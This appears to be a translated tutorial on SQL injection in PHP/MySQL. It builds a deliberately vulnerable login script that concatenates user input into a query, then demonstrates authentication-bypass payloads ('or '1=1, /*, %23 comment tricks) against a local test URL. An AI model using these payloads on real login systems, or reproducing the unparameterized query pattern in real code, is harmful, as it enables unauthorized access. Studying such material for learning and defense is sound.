Let me first give you an example to understand the particularity and principle of injection under PHP. Of course, this example can also tell you how to learn to construct effective SQL statements.
Let's take an example of user verification. First, create a database and a data table and insert a record, as follows:
PHP code:
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3;
#
# Export the data in the table `user`
#
INSERT INTO `user` VALUES (1, 'angel', 'mypass');
The code to verify the user file is as follows:
PHP code:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("Database connection failed");
$sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
if (empty($userinfo)){
echo "Login failed";
} else {
echo "Login successful";
}
echo "<p>SQL Query:$sql<p>";
?>
At this time we submit:
http://127.0.0.1/injection/user.php?username=angel'or 1=1
and it will return:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F :wwwinjectionuser.php on line 13
Login failed
SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password='
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:wwwinjectionuser.php on line 13
See? After the single quotes are closed, the following single quotes are not commented out, resulting in the single quotes not being paired correctly. Therefore, it can be seen that the statement we constructed cannot allow Mysql to execute correctly and needs to be restructured:
http://127.0.0.1/injection/user.php?username=angel'or '1=1
At this time, "Login Successful" is displayed, indicating that it is successful. Or submit:
http://127.0.0.1/injection/user.php?username=angel'/ *
http://127.0.0.1/injection/user.php?username=angel'%23
This will comment out the following statements! Let’s talk about the differences between these two submissions. The first sentence we submitted uses logical operations. It can be said to be very widely used in ASP. Needless to say, right? The second and third sentences are based on the characteristics of mysql. Mysql supports two comment formats: /* and #, so when we submit, we comment out the following code. It is worth noting that due to encoding problems, we submit # in the IE address bar. will become empty, so when we submit in the address bar, we should submit %23 before it becomes #, and it is successfully commented. This is much simpler than logical operations. It can be seen that PHP is more powerful and flexible than ASP Much more.